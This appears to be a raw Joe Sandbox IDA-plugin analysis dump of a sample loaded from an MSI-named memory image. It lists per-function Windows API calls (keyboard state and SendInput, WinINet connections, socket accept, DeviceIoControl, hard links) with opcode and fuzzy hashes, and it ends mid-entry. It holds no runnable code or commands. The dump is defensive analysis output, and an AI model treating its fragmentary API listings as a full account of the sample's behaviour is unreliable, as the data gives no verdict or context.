                                        • Instruction ID: 735ea99cff528986b806d2001b970c3c2d669fd25a9aca6e6423183ea9a97266
                                        • Opcode Fuzzy Hash: df2897d1925454d360292b317a5170108585e7ce740e8d9c24f82b34f4a68e22
                                        • Instruction Fuzzy Hash: 9AB17B71604300DFC714EF28C484A6AB7F5EF89354F14886EF8899B352DB39E946CB92
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 007CAF56
                                        • CoUninitialize.COMBASE ref: 007CAF61
                                          • Part of subcall function 007B1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007B10B8
                                        • VariantInit.OLEAUT32(?), ref: 007CAF6C
                                        • VariantClear.OLEAUT32(?), ref: 007CB23F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                        • String ID:
                                        • API String ID: 780911581-0
                                        • Opcode ID: 9bb87a0d3d64553a099a7547fa50494b595da7f8130ad71d3224320a6c6d8bf6
                                        • Instruction ID: 55630a0eb1fe1197a994a3d0c405041c5ed0eadd62afafe98f53ad63f518c962
                                        • Opcode Fuzzy Hash: 9bb87a0d3d64553a099a7547fa50494b595da7f8130ad71d3224320a6c6d8bf6
                                        • Instruction Fuzzy Hash: 24A10675644601AFCB10EF14C89AF1AB7E4BF88360F14845DF9999B3A1DB78ED44CB82
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                        • String ID:
                                        • API String ID: 3877424927-0
                                        • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                        • Instruction ID: 8ec133ae2cb393ca9e2bcecd1841f5850e9d09114736100c64371edd7fb26e28
                                        • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                        • Instruction Fuzzy Hash: 2751D530A00345DBDF248FB9E884EAE77B5AF41334F248729F875A62E1D7789D529B40
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 007DC354
                                        • ScreenToClient.USER32(?,00000002), ref: 007DC384
                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 007DC3EA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        • Opcode ID: 64d3415dea791b551f3e746ae46608a0d0103c7c68f0c60ed037a989b99ca289
                                        • Instruction ID: df79d63657d2e46f1ae16dc599835dfaccbdb5043c01f3296085fe723ad08cf2
                                        • Opcode Fuzzy Hash: 64d3415dea791b551f3e746ae46608a0d0103c7c68f0c60ed037a989b99ca289
                                        • Instruction Fuzzy Hash: 37517C31A00246EFCF21DF68C884AAE7BB6FB45360F24856AF915DB290D774ED41CB91
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007AD258
                                        • __itow.LIBCMT ref: 007AD292
                                          • Part of subcall function 007AD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007AD549
                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 007AD2FB
                                        • __itow.LIBCMT ref: 007AD350
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$__itow
                                        • String ID:
                                        • API String ID: 3379773720-0
                                        • Opcode ID: fe4d803d0b1415065dfa55a5ee40e1534050dd42eae5708c192bd2cbf929b9af
                                        • Instruction ID: 6b4ed504c221eaed1594cdee6632b0fbe7118dc5ea9077c3a999a0d30522cd95
                                        • Opcode Fuzzy Hash: fe4d803d0b1415065dfa55a5ee40e1534050dd42eae5708c192bd2cbf929b9af
                                        • Instruction Fuzzy Hash: 1B41D871A00309EBDF21EF54C856FEE7BB9AF89740F004119FA06A3291DB789E45CB52
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007BEF32
                                        • GetLastError.KERNEL32(?,00000000), ref: 007BEF58
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007BEF7D
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007BEFA9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: ba48c80af94b6827cc9c7851104225e73c0fe4b9c85aabe3a7471551e87589bc
                                        • Instruction ID: 34ade5f8c1b4bb7374698f62d970af70ce6de3ec9bf8c95b4ad4a605fc07a8f3
                                        • Opcode Fuzzy Hash: ba48c80af94b6827cc9c7851104225e73c0fe4b9c85aabe3a7471551e87589bc
                                        • Instruction Fuzzy Hash: 12414D35600611DFCF11EF15C548A99BBE5EF89360B19C498E849AF362CB78FD40DB92
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007DB3E1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID:
                                        • API String ID: 634782764-0
                                        • Opcode ID: e83a4259fa5ecbf3ac4ec9002a6d6bd42f4d1df97da6b49515bf5af90efe3b41
                                        • Instruction ID: a43d966ecdf31d4626d5b4a21c6f9ba5b33e63f91fa8e7b655fbb6a1c8f1ad38
                                        • Opcode Fuzzy Hash: e83a4259fa5ecbf3ac4ec9002a6d6bd42f4d1df97da6b49515bf5af90efe3b41
                                        • Instruction Fuzzy Hash: D6318D34600244EBEF24DE58CC99BAC3775EB0A350F668513FA51D63A2C738E940AB61
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 007DD617
                                        • GetWindowRect.USER32(?,?), ref: 007DD68D
                                        • PtInRect.USER32(?,?,007DEB2C), ref: 007DD69D
                                        • MessageBeep.USER32(00000000), ref: 007DD70E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: b3b3411f25edb52a3d9976125c7c6024eaae81628904e58b9ab110fb99061fb6
                                        • Instruction ID: ffc933bc21a3acab3cc1cee8654258edbea32e6cd85b625aab125bd7e4bba2fe
                                        • Opcode Fuzzy Hash: b3b3411f25edb52a3d9976125c7c6024eaae81628904e58b9ab110fb99061fb6
                                        • Instruction Fuzzy Hash: C4416930A00118DFCF21DF98D884BA97BF5BB89790F1881AAE519DB391D738EC41DB90
                                        APIs
                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 007B44EE
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 007B450A
                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 007B456A
                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 007B45C8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: c654244d08556fa9df441794450a35cf12c9491bc750d5a823fcebd64e5ed30f
                                        • Instruction ID: 7e049ed9c1766a7b1804c4d88ad28052eb000f969d454cb1e2ebdc212d42c739
                                        • Opcode Fuzzy Hash: c654244d08556fa9df441794450a35cf12c9491bc750d5a823fcebd64e5ed30f
                                        • Instruction Fuzzy Hash: 7231F8B1904658AFEF308B6498197FE7BB5AF45314F04015AF482932C3C77C9EA5D762
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007A4DE8
                                        • __isleadbyte_l.LIBCMT ref: 007A4E16
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007A4E44
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007A4E7A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 36327638de06e9ef4ea33dfcfa011e872f1c9dd263ad308f863b742f7e36f18a
                                        • Instruction ID: 3aaded0172464adf2fe7918d77f0972205168b8d5a5c024ba0b5d6a4345aa5dd
                                        • Opcode Fuzzy Hash: 36327638de06e9ef4ea33dfcfa011e872f1c9dd263ad308f863b742f7e36f18a
                                        • Instruction Fuzzy Hash: 9B31C130605246EFDF219F74CC45B6A7BA6BFC2310F158628E421871A1E7BADC51D790
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 007D7AB6
                                          • Part of subcall function 007B69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 007B69E3
                                          • Part of subcall function 007B69C9: GetCurrentThreadId.KERNEL32 ref: 007B69EA
                                          • Part of subcall function 007B69C9: AttachThreadInput.USER32(00000000,?,007B8127), ref: 007B69F1
                                        • GetCaretPos.USER32(?), ref: 007D7AC7
                                        • ClientToScreen.USER32(00000000,?), ref: 007D7B00
                                        • GetForegroundWindow.USER32 ref: 007D7B06
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: 76a4398b424f86c186f64ff09f750e6f8ce0f56ab95a9f4e19f5844627d38878
                                        • Instruction ID: 47520146f8229f965ddd0424db38fac02b1f17f94cae79f1b9aa7c754f51eb81
                                        • Instruction Fuzzy Hash: 6A31F171D00108AFCB10EFB5DC859EFBBF9EF58314B10806AE915E7211E6399E05CBA0
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C49B7
                                          • Part of subcall function 007C4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C4A60
                                          • Part of subcall function 007C4A41: InternetCloseHandle.WININET(00000000), ref: 007C4AFD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Internet$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 1463438336-0
                                        • Opcode ID: 185361a158e7e74e885546ec465a56f58eed7cbdaa060805151286db1dcfb649
                                        • Instruction ID: f5f7c745a36f08322724d3474ea9315bd9e17c57a6fcf4613367c82dcc21c401
                                        • Instruction Fuzzy Hash: A921C631240605BFDB259F60DC14FBFBBAAFF48711F14801EFA0596550EB79E811A7A4
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 007D88A3
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007D88BD
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007D88CB
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007D88D9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: b9b3e96fb05e17deeb0363dfb31e669a09234c38089acc6972bda7044047e972
                                        • Instruction ID: b588585c23ed37137fa2b853bae013f8212136e7bbdf53309f81f6792ac2e50f
                                        • Instruction Fuzzy Hash: B211B431344110AFDB14AB18CC09FBA77AAEF45320F148119F816C73D1CB78AC00DB95
                                        APIs
                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 007C906D
                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 007C907F
                                        • accept.WS2_32(00000000,00000000,00000000), ref: 007C908C
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C90A3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLastacceptselect
                                        • String ID:
                                        • API String ID: 385091864-0
                                        • Opcode ID: 5beb4b9d73f0923ebeed56b87c5a7b2baf7f0e5486e9058f2cdb5945a3dd1ec0
                                        • Instruction ID: 430518f0a468c0ea0b9b53d982c8eff293a9a213f4d92a62048460ef9df3898c
                                        • Instruction Fuzzy Hash: 7B2157715001149FC720EF69C849A9EBBFCEF49750F00816DF949D7251DB789E41CBA0
                                        APIs
                                          • Part of subcall function 007B2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007B18FD,?,?,?,007B26BC,00000000,000000EF,00000119,?,?), ref: 007B2CB9
                                          • Part of subcall function 007B2CAA: lstrcpyW.KERNEL32(00000000,?,?,007B18FD,?,?,?,007B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007B2CDF
                                          • Part of subcall function 007B2CAA: lstrcmpiW.KERNEL32(00000000,?,007B18FD,?,?,?,007B26BC,00000000,000000EF,00000119,?,?), ref: 007B2D10
                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007B1916
                                        • lstrcpyW.KERNEL32(00000000,?,?,007B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007B193C
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,007B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007B1970
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 03ac110adcb15c1f09e3e2f62105bc0311dcf40171dd87052a12616b0eb748fb
                                        • Instruction ID: 882cb5c2cb173da1ce9331b6a51d4f99acb42c7ebebde74af8ce2357495beb54
                                        • Instruction Fuzzy Hash: 9011D636100345EFDB159F34D869EBA77B9FF45350B80802AF806CB250EB39A951C7A0
                                        APIs
                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007B715C
                                        • _memset.LIBCMT ref: 007B717D
                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007B71CF
                                        • CloseHandle.KERNEL32(00000000), ref: 007B71D8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                        • String ID:
                                        • API String ID: 1157408455-0
                                        • Opcode ID: a5ddcab1516c2076ed2639291789f387dcd3a2e4dae59192f25344713fa051bf
                                        • Instruction ID: 682a654a8f63f38327408ac8f22b38b12fb7f4e135ef071f7e402f5954f9fcc6
                                        • Instruction Fuzzy Hash: 7611947190122C7AD7305B69AC4DFEBBB7CEF85764F10419AF504E7190D2744E80CBA8
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007B13EE
                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007B1409
                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007B141F
                                        • FreeLibrary.KERNEL32(?), ref: 007B1474
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                        • String ID:
                                        • API String ID: 3137044355-0
                                        • Opcode ID: 8ea089d5e5c5840c17a9520f109a9c56223ccaf782c87502ba69a589a9677f8f
                                        • Instruction ID: 44d17e0d8b94d27716e0c978b9149f64db0a2744521027d55ac54494968cbf94
                                        • Instruction Fuzzy Hash: 55217CB1A00249EBDB209F91DC98BEBBBB8EF00744FC08469A61297550DB78EA44DF51
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007AC285
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007AC297
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007AC2AD
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007AC2C8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: d26ed5ad8f04e68514dbd2905b5571b91e1a565744997a3fe32c6468aacae212
                                        • Instruction ID: 68b4c8f4245a449319f9932f7727160b4c87ac10608bc1e6b1b565bbe9023c84
                                        • Instruction Fuzzy Hash: 7C11487A900218FFEB12DBD8C884F9DBBB4FB49710F204191EA00B7294D671AE10DB94
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0078C657
                                        • GetStockObject.GDI32(00000011), ref: 0078C66B
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0078C675
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID:
                                        • API String ID: 3970641297-0
                                        • Opcode ID: 9d837b451c78cc6e0e7236fa60df546a8936f2985cef58bc8b709998e45fcf97
                                        • Instruction ID: 1537c2cf1ea6b5c97bd85a106b6aaa263689760c12927e12d573ca492a608a72
                                        • Instruction Fuzzy Hash: 5111A172601548BFDF125FA09C44EFA7B69FF08364F054221FA1452010D739DC60DBA4
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B354D,?,007B45D5,?,00008000), ref: 007B49EE
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007B354D,?,007B45D5,?,00008000), ref: 007B4A13
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B354D,?,007B45D5,?,00008000), ref: 007B4A1D
                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,007B354D,?,007B45D5,?,00008000), ref: 007B4A50
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 680c7ce2911d8652dd3ac4f2fecde9d9e8888e56d5fe53d2409c0c7dffcb841d
                                        • Instruction ID: 86bdabf43e4fdd84d102788b774ac4aec2cbe620922a90dcfc18fcaa98b741ad
                                        • Instruction Fuzzy Hash: A1112771D4052CDBCF10AFA5DA89BEEBB79FF09711F018055E941B2241DB389960CBA9
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                        • Instruction ID: 27d1f450b212754d2373f0c6275b1aaf2783884f1a2523d4181f80ba5417ce37
                                        • Instruction Fuzzy Hash: CC01407200064EFBCF165F84DC45CEE3F62BB5A350B588615FE1859035D23ACAB1AB91
                                        APIs
                                          • Part of subcall function 0079869D: __getptd_noexit.LIBCMT ref: 0079869E
                                        • __lock.LIBCMT ref: 0079811F
                                        • InterlockedDecrement.KERNEL32(?), ref: 0079813C
                                        • _free.LIBCMT ref: 0079814F
                                        • InterlockedIncrement.KERNEL32(01763630), ref: 00798167
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                        • String ID:
